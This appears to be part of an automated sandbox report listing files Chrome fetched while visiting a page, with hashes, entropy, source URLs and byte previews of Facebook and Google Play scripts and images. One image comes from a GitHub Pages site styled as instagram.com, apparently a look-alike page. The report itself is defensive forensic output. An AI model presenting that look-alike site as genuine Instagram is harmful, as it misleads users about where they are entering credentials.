                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?.....6.mU.....S.eX.......{.p.....kF.1....t.z...*...:$....B.:.:.......?....V..C.5.....S.....2./...]...L.fl..9#./.\.'...A..X0..-.P.'.<.i...(.|.G...H.....>I2.(d.K...B.I..D..*..g-...n.9(. .....sJ>........T.!"r.^.A..'#.4..+.I..l.^.....X....../.S.`..<..~.w=.....m.6.bl.N...bl.6?_.E..D._@P..N.....Y.Rf.T..h.v.....2..T.((...5.k.o...#.fCY~../...3T.TK5.P[Zn....s..G#R4.M...,.j.^.NMJS..::..-,jk..LNH.1h......-.h.F..7....Ym...............:..vH.Nh..4....t..G&.d...&.m.g......H...mi....F:..n.;....o..6..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):733
                                                                                                                                                                                                                                  Entropy (8bit):4.7574006224426535
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:YGKzFDsip968DDp8MIfE1lI11I1581f58zrF8qWKxk8IV5wDKOBuGpQJNGzF/BQU:YdxDsinqMIqlI3I1y1fyzr+jcdD9J+Sn
                                                                                                                                                                                                                                  MD5:CC64BFA00B4B3FF916A983A0C27DEA58
                                                                                                                                                                                                                                  SHA1:62452E81D49DF7E3EDAE74AE32A3E9A613DCFE86
                                                                                                                                                                                                                                  SHA-256:67CB92C8D3E193BCAC15DEBC8CC34C5D2CE531C9A13D037EBFECDC662679215A
                                                                                                                                                                                                                                  SHA-512:C6D1D59F4D354EF39AA6D59002D23AB6AEA977CC3B68FE9A6D0821FC0C6EE279390A35B8DB2E7E8D39C913694811CEF04763452D8075C63722700E2B5120F3EC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:{"compoundSeparator":"_","fieldsMap":{"loadUrl":{"timestampFields":{"fetchStartTime":["fetchStart"],"domainLookupStartTime":["domainLookupStart"],"domainLookupEndTime":["domainLookupEnd"],"connectionStartTime":["connectStart"],"connectionEndTime":["connectEnd"],"secureConnectionStartTime":["secureConnectionStart"],"requestStartTime":["requestStart"],"responseStartTime":["responseStart"],"responseEndTime":["responseEnd"]},"otherFields":{"requestUrl":["name"],"transferSize":["transferSize"]}}},"metricsUrl":"https://xp.apple.com/report","performance":{"samplingPercentage":0.25,"samplingPercentageUsers":0.25,"sessionDuration":60000,"samplingPercentageUsersPageRender":0.25,"sessionDurationPageRender":60000},"postFrequency":5000}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6074)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):42228
                                                                                                                                                                                                                                  Entropy (8bit):5.4392336436603115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:xS0vaKKc046ua0iuyZC7sy2fOq8sMwjwr0ifGTpWeQs1bA6Mw5Z49xr+3hYmJ:o0vaKKJ2yZC7sy2fOqOwjwr0ifGTpWeP
                                                                                                                                                                                                                                  MD5:7474DE3D2949B8F685DF177F250F6A9D
                                                                                                                                                                                                                                  SHA1:DA6E1C04754418FC9726F4B937789887F3AA63E7
                                                                                                                                                                                                                                  SHA-256:A1869D4A2B4EA39126F3C40B4830EBBD0C04B0C9F8E55B0FD206EB996EEB6903
                                                                                                                                                                                                                                  SHA-512:BFB102814A697AF07B0CE2B8D11C7519F1CFDBE16296E73BACAC2E98F04518373531AF45996153EB1980ED40F866068D91234C761D7CF8E08860C41846F9CA4B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3i5IJ4/yI/l/en_GB/erWoO4SeR1N.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsAdoptionCloseButton.react",["BUICloseButton.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){a.size;a=babelHelpers.objectWithoutPropertiesLoose(a,["size"]);return i.jsx(c("BUICloseButton.react"),babelHelpers["extends"]({size:"large"},a))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("ContextualDialog.react",["ReactAbstractContextualDialog","ReactLayer"],(function(a,b,c,d,e,f,g){a=d("ReactLayer").createClass(d("ReactAbstractContextualDialog").createSpec({displayName:"ReactContextualDialog"}));b=a;g["default"]=b}),98);.__d("AdsPopoverLink_DEPRECATED.react",["cx","ix","AdsFBIconDownsized.react","BUICloseButton.react","ContextualDialog.react","Image.react","LayerFadeOnHide","UserAgent_DEPRECATED","clearTimeout","joinClasses","react","setTimeout"],(function(a,b,c,d,e,f,g,h,i){"use strict";var j,k=j||(j=d("react"));a=j.Component;var l={imgNormal:i("403740"),imgHover:i("403741")};b=function(a){babelHelpers
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14008)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):80554
                                                                                                                                                                                                                                  Entropy (8bit):5.472094188360212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:WgOvE4SMUyM00qiV+1qW7GNNXHMJhFOuUATsUDuRZskq6vSIghFQe:2OKMV5/qe6CRs
                                                                                                                                                                                                                                  MD5:FDB9C1F20F28A8D325381794CAC0DB44
                                                                                                                                                                                                                                  SHA1:B15729F3CBE270C665E35C7A7B53552592F393F6
                                                                                                                                                                                                                                  SHA-256:5EBBB25432E3F899E1A55AAC5E35F7DD1EB35F83068311CB521035F09AC6366D
                                                                                                                                                                                                                                  SHA-512:DE872F58E30CE70DD92AC91741644E7D077A83252CE4328DF825AC48F97D0B9E673E6D5C55E11DE8952545D4577AAB20988887299B9315649D0E1646BAB0904D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iwp84/yz/l/en_GB/yH3NmCM2cz1.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ARIAComboboxNotify",["fbt","ARIA","UserAgent"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!c("UserAgent").isPlatform("Mac OS X");function a(a){if(a&&!i){var b=a.getTitle();a=a.getSubtitle();d("ARIA").notify(a?b+", "+a:b);return!0}return!1}function b(a){a=h._({"*":"Found {number} results","_1":"Found 1 result"},[h._plural(a?a.length:0,"number")]);d("ARIA").notify(a)}g.maybeNotifyHighlightedEntry=a;g.notifyFoundEntries=b}),226);.__d("AbstractTokenizer.react",["cx","cr:4057","cr:6052","cr:7934","emptyFunction","getActiveElement","joinClasses","react"],(function(a,b,c,d,e,f,g){var h,i=h||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(){var c,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(c=d=a.call.apply(a,[this].concat(f))||this,d.$1=i.createRef(),d.$2=i.createRef(),d.state={queryString:"",lastQueryString:d.props.queryString},d.focusInput=function(){d.$1.current!=null&&d.$1.current.focusInput()}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15742
                                                                                                                                                                                                                                  Entropy (8bit):7.987435431620976
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rSgE/rsWBEBVleHQZk5PtkJ8ydwFMQbvEnSideDbE:WnrlBEBVliQSPtkJ8AwSQjecQ
                                                                                                                                                                                                                                  MD5:0CA92FFEFA961F83064FE5FEE52C99DD
                                                                                                                                                                                                                                  SHA1:59C5D5F1821274B00E103DBA07CDDC857C4B42A8
                                                                                                                                                                                                                                  SHA-256:F32E8E7F4D7DAA42569D62624C20063A956DBCA27A660BF0F0B28BB55F419CE7
                                                                                                                                                                                                                                  SHA-512:3CBD1FE45B04240F6A00560722759D17A0C77F1F7B2B11FFAA3AF744907DEF510643B8FE2D90BAC3135FF29749BC4AAFCB2DEC71BA57E0BDF6B7B172CD0CC490
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=s256-rw
                                                                                                                                                                                                                                  Preview:RIFFv=..WEBPVP8X..............VP8 .=.......*....>i*.E."../6|.@..h.p..ge.....*}..?.?.......ky.t_.?........D.7.o......V../R.......7.K.#.....oP....z.=..s.:.u...................C.."....G?$.&}.j;.r?......~........}.....z......r.3......._.~.?.....'..........R........./...O.....?.{.........;..9"...l.P..S.......Bg.k....7..MO#/.n..u.^.Qi.l.Z.....y'bw.._.w/..9}I6.d.......0<..Y5.Y..^.....$Y.."....M...h..5..kqk.Eg.....4....H.3.1<.......P...}.E...@.*Y.........=4.E..........c.(...p..l...zJ{..,..[V`..|.:.A...`4..z..<...S.....]X.9_...3.;...o.Q(....>&.>.O.....Kn^.E.ZP....,...G....F].l_.y......W....V...Z:.Om;./..7E.t_.Z0..-JV....*.J?V....I..K..y.h.2X7.S.(R.F;@..>.."cZ.../=.(X....*;BX-X<.h?L.6...4?.%.<.5...T.dx;kx....p......o<..7R.e~.2.........*Aw.F^..7.,...7.o.yY.W.....oY.B4W.U.......D{;.....l3.c..#.3g.g.,.p.....].=.M......y...2.(..../4.w=a.<. .H8y...y.9K..t......>(..G.......c....J.<.:.....cx.......t~C..|.v9...n..`:..Y.h...L.&Z...^m....".......?..s..eR..<.9bt..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9038
                                                                                                                                                                                                                                  Entropy (8bit):7.954037396427113
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:g1uA4quq42sVtFzLqsPgdPFI2dWEhdHkiRT9B0Wgq39wIEgDSAwwO:g1f4Dq4xz1L5+FIchXl9Ba/87HO
                                                                                                                                                                                                                                  MD5:1452D115B4D97EE75BE7AB313689E25D
                                                                                                                                                                                                                                  SHA1:0D615B4718905D7DEE847A86DBFC2A6F75C3E3FB
                                                                                                                                                                                                                                  SHA-256:F63E7F21C2005AC04C09F72EF1587DC91C6B2261D1333311E5200ABB16010492
                                                                                                                                                                                                                                  SHA-512:958BC36E59C4426E47BDE9DC668C22B5891CD00FD3658B8B2691473FD4FE2D6B6A4B1E02F356F79B4BFC9A62C51AC0FC154E4FE5F0BFEE620BA4B8EBED7D3098
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFF#..WEBPVP8X........?..?..VP8L."../?...M(l...v...G$...|.7.L.q.V..1"......m#.w.....po>.....INz.p....|..zfV."IRT.{.b....33_.?..u.:..........$C.a..U.s.L.!..O.P..n.........v..Q........M.j......J..>.2.|..r.vY'.9.9.......k..../.....5...m..?....1..h.2.z.B........eLr......Na.........sWfff.lHb.%..a..$.V$9....D.....i.C....D..6.=03333..82".{..m.me........?.=..A.11U..d.F.ND#r.....m.x.....m.........#k....\I..t..g.c,.8..m...m...X^k<}...N'.....?..m.!...._D$K].k...o.k..m...m...=...WO.tu13#...p..G..9..}..aUR..m....}.....Y'.W.J..;.m....t...=...N..7X*z..}~."_.....Ccc...P...`.. &`..W0.h..!..|...t....B.&........O...(d.S..$.N.....\1.....C.H.....O......#..N.T..^..}._e..-.... .k,..P`.4...P. ..z....X.\..<.>\ _.....@.{8....{.U...q.!] .M.H..`.. D @..&.I...!........:C.d...o....\x..\...-...ZL...6(...`14....j6...P.1..(W.P...Qp.k.2.\..Y.SW)g`.@..B)....!....o.....0......3)M....s..aK3.Mma8....K.-nx...0....)..4.2PSp.........(...Z.35R.h*...n|.......
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10467)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):175637
                                                                                                                                                                                                                                  Entropy (8bit):5.543169719587562
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:4ghUaItJU64CI4gCEMcqdEc9QkLv1vQcqdI08QBVMJ6FIOKaKtYBZ:4ghUaItJU64T4gCEMcexQkLv1vQceI0h
                                                                                                                                                                                                                                  MD5:F9A32D9AA0001580F8F84862DCEB9ED2
                                                                                                                                                                                                                                  SHA1:027A1D65EA4500404BF33F155C52E592BE9267B1
                                                                                                                                                                                                                                  SHA-256:D4C628FF740F0C7D7637EDC1FE6DC8A90EC8A24A406D3C83F2E99128D624E398
                                                                                                                                                                                                                                  SHA-512:BF5312CCFE75EA7BECD7A007C0BFD06F4285D9ED29BB848DDE8C41961F24CC7E3343D5332E6AA7F2B717A58AD8F2258DBC32BE84794FB2FBBCF7882DF5F4CC27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("APIConstants.brands",[],(function(a,b,c,d,e,f){"use strict";a="3.0";b="v"+a;c=3e3;d=750;f.GRAPH_API_VERSION=a;f.API_VERSION=b;f.DEFAULT_API_LIMIT=c;f.DEFAULT_API_ACCUMULATE_LIMIT=d}),66);.__d("SearchSourceQueryStatus",[],(function(a,b,c,d,e,f){a="ACTIVE";b="COMPLETE";f.ACTIVE=a;f.COMPLETE=b}),66);.__d("SearchSourceCallbackManager",["invariant","SearchSourceQueryStatus","createObjectFrom","nullthrows"],(function(a,b,c,d,e,f,g,h){a=function(){function a(a){this.$9=a.parseFn,typeof this.$9==="function"||h(0,4065),this.$8=a.matchFn,typeof this.$8==="function"||h(0,4066),this.$2=a.alwaysPrefixMatch||!1,this.$6=a.indexFn||i,this.$4=a.exclusions||{},this.reset()}var b=a.prototype;b.search=function(a,b){var c=this.$13(a,b);if(c)return 0;this.$1.push({queryString:a,callback:b});c=this.$1.length-1;this.$10.push(c);return c};b.$13=function(a,b){var c=this,e=this.$14(a),f=!!this.$5[a];if(!e.length){b([],a,f?d("SearchSourceQueryStatus").COMPLETE:d("SearchSourceQueryStatus").
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):81561
                                                                                                                                                                                                                                  Entropy (8bit):5.343746592742468
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:RJeUwT76HXhpwNCHM9ZK0BK01QJnYTZ02LKVsdmpyKcicMky:RIT7OXDs9ZKAKBtYj8wKcHM3
                                                                                                                                                                                                                                  MD5:93BBEFE809CA6D13CE9D268992A2CCB9
                                                                                                                                                                                                                                  SHA1:A48527C92D40BA399BA05F884B74750AF08F4524
                                                                                                                                                                                                                                  SHA-256:E478089461CCB3C99FFFA89D04E02A48A7DB163A211C42CF36C4CEFBD6511F22
                                                                                                                                                                                                                                  SHA-512:5B4C85F285D834FDB889B0171FB00C54C0B28C6E53C1B41045747CBD9E05A0F8C9858406C8394F6F532F129FF6652A360AF945951EEB2E12503F18B585792FE4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 206 x 58, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3841
                                                                                                                                                                                                                                  Entropy (8bit):7.55092275485853
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4G+kH1Z9kSc0gh02rcTjdVX90SqLrUGc5xelk4Go5o:L+kVTkSbzM4l1Bo5o
                                                                                                                                                                                                                                  MD5:C46F54E523F2656D2F518D51623448A0
                                                                                                                                                                                                                                  SHA1:D8F8311AE18FCD2B0D9BEA85EB29A20E209518F8
                                                                                                                                                                                                                                  SHA-256:B9C604018A550B63D359608469904DE09B8EFC5F38395CCA106FAA49262DFDE0
                                                                                                                                                                                                                                  SHA-512:9EB3830D8647D31CFBB5587C5FE0C06066E95BBEB23C3C65076EEB6448EC6D42C615FC42EBA446AF054866E15FEFC7C9D205DF4846D886B0242B76FBA7E5602A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://sayidanur.github.io/instagram.com/img//instagram-logo.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......:............PLTE...#. #. ...# $.$#. '!!@ @# $$$$ !#. (""#. +++$$$%!!UUU# !...'!!$.!$ !%.%$. ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%.!333%""$ $# !$.!$ !$ !$ &""999&&&% "#. '''&!!(((#.!$ !$$$%."# "$ $.!#### !$ $.!% $ $.!$.!$!!$.!$$$# !$. %."$ !$. '''$ !#.!,!!)""$ !# $!!$ #.#+ +$ $!!$. ######+++$. $ !$!!# !&""$ $&&&+++$.!####.!$ !333$. ( (3""---# $!!'##$.!)!!$ &""# $."$""$ "'##$ $ # !$. &&&& &$ !$ $. $ "% $ $."#.!#. $. %!!$ "# !$ &""$.!$ $ %""# $ !#.!%""$ $. $!!#.!$!!$ !$$$$$$$!!$!!'''# "% "$. #!!$ !$ $ "$ !# $.!$$$# !$."$.!%!!# # #. % $. %!!+""$ $.!% "# !# %.!$.!%!!#.!$ !% #%!!&.##!!$.!$ !$ '""#.!# !&!!#.!#!!% # !$ # # !$!!#.!& ##!!% &."$$$& $ $.!$ "$ !$.$#!!$ "#!!#.!&.#$ $ "# # $ 0 0$ !$ !#.!$!!$!!#.!$ !$ "$ $.!$!!#. R.......tRNS.....1....2..&...>...'..)..P...,.-.0=.Hk....K@...C..a.!/...*R..z$.oO..d.#..Z.....%.WN.A..\.3......58...:... ...VB..~D.j[.;...."(...in.b...Eq.G<..L..S..F.U.......h.m.?......r
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (706)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3405
                                                                                                                                                                                                                                  Entropy (8bit):5.571622388426759
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kw5TDkB1BTHASxcKqieTNtZLhXGhIdLlBIa3GRl:XTDknN2JIOG
                                                                                                                                                                                                                                  MD5:CEB5C462360ADE5182B3B5F82341F434
                                                                                                                                                                                                                                  SHA1:6BEAF99A09B111767CF624D0532075ED6EDE7809
                                                                                                                                                                                                                                  SHA-256:39BCFC697077BB76AA69B67FB4629AD9148E127039B028EC779B8011109B83DA
                                                                                                                                                                                                                                  SHA-512:81BA2078D4FB2486872DA99F1AF49CA58F454771C57E1FE3E59E78A5C92FE1ACA545260FC19C28B74B3630F457D16B562CDB380362B5B12156DA2FAF9AC69573
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("Wt6vjf");.var udb=class extends _.z{constructor(a){super(a,0,udb.ke)}rc(){return _.dh(this,1)}mf(a){return _.zh(this,1,a)}};udb.ke="f.bo";var vdb=function(a){a.nI&&(window.clearTimeout(a.nI),a.nI=0)},wdb=function(a){const b=_.ZK.get(window.location.protocol=="https:"?"SAPISID":"APISID","");a.OG=a.QE!==""&&b==="";a.UO=a.QE!=b;a.QE=b},ydb=function(a){a.Xz=!0;const b=xdb(a);let c="rt=r&f_uid="+encodeURIComponent(String(a.hJ));_.Ek(b,(0,_.Ze)(a.N,a),"POST",c)},RL=function(a){if(a.OM||a.Xz)vdb(a),a.nI=window.setTimeout((0,_.Ze)(a.H,a),Math.max(3,a.WE)*1E3)},xdb=function(a){const b=new _.Yn(a.TV);a.kK!=null&&_.jo(b,"authuser",a.kK);return b},.zdb=function(a){a.OG||(a.Xz=!0,a.WE=Math.min((a.WE||3)*2,60),RL(a))},Adb=class extends _.Vj{wd(){this.OM=!1;vdb(this);super.wd()}H(){wdb(this);if(this.Xz)return ydb(this),!1;if(!this.UO)return RL(this),!0;this.dispatchEvent("p");if(!this.hJ)return
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (551)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2784
                                                                                                                                                                                                                                  Entropy (8bit):5.629660032195074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kuoPnqZoTWVzcP9j4g4YuMyuc8bHv0scVkgaWDIgCS4lddyLdsqvNgo4F7q7XVPl:kuoPnqjt8bHvRLr2I17IjvNpRFnl
                                                                                                                                                                                                                                  MD5:0B77B2491EAC06A5DEE4B34CD3725D36
                                                                                                                                                                                                                                  SHA1:B2A77E5866D8BEF17DAD3EEF3CD0CC51B0E082A1
                                                                                                                                                                                                                                  SHA-256:95A510F000B7F8A863FDC71B353E625F586924A0135FA0599E0B6DFD54582EEC
                                                                                                                                                                                                                                  SHA-512:3C8AB119E12342514E64CA2A36858481649E463BA513ECCAF0073B9836D134ECE2F49A17AA581DCEF5547E83C38CE6F6EA422E5D457017A3DF2E6C6CAB8BFC79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.gTc=function(a,b){var c=a.qa;a=a.fs;let d='<div class="'+_.T("xsHe0")+'">';var e='<div class="'+_.T("F9Zt5c")+(_.yh(a,3)===2?" "+_.T("BIF3ub"):"")+'">';const f=a.Sd(),g=f.length;for(let H=0;H<g;H++){var h=b,k=f[H],m=_.yh(a,3),n=_.vh(a,5);var q=_.P;var t=void 0,v=h;h=k;t=k="";switch(h.getItem().uc().Fa().H()){case 7:t+=""+h.getItem().Gb().Ga().H();break;case 10:t+=""+h.getItem().Ye().Ga().H();break;case 9:t+=""+_.ou(h.getItem()).Ga().H();break;case 1:t+=""+_.vy(h.getItem()).Ga().H()}var y="";switch(h.getItem().uc().Fa().H()){case 7:y+=._.Yo(_.zW(h.getItem().Gb().Pa().H().getUrl()));break;case 10:y+=_.Yo(_.zW(h.getItem().Ye().Pa().H().getUrl()));break;case 9:y+=_.Yo(_.zW(_.ou(h.getItem()).Pa().H().getUrl()));break;case 1:y+=_.Yo(_.zW(_.vy(h.getItem()).Pa().H().getUrl()))}y=(0,_.Io)(y);y=(0,_.Io)(""+y);var x=h.getItem().uc().Fa(),D=_.F(h,_.rA,2).qc()?.hb();var A=_.F(h,_.rA,2)?.qc()?.jc(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.214146575264509
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvn0/hZop/AuGNG/QVIGeIhigVQuYGwQRaNw6JpyxZRNlad0:kRZTFOZISI/AI9yigiup8kbRN20
                                                                                                                                                                                                                                  MD5:EAE9B28A5A6B8D61F4EFA51B4BB6AC47
                                                                                                                                                                                                                                  SHA1:0FAD8F193FC3DB5B252BE2FC4969C88F8BB62E7E
                                                                                                                                                                                                                                  SHA-256:3AFFA28217A635DF9AC9D3900D4829C7C6346981EFA68C0338DF31F464434C54
                                                                                                                                                                                                                                  SHA-512:BE005B6494F2D30749475B0FA74A8DFC630018192A8B0D91E30BBB4165EA96CB31B2EABCF191BF7F93A3815A57DC300BF0B9F73167A83AD86B0157919847A69B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=qk5AGd"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("qk5AGd");._.qr(_.oAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qk5AGd"}N(){return!0}Xa(){return _.p5}});_.$q.qk5AGd=_.wz;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
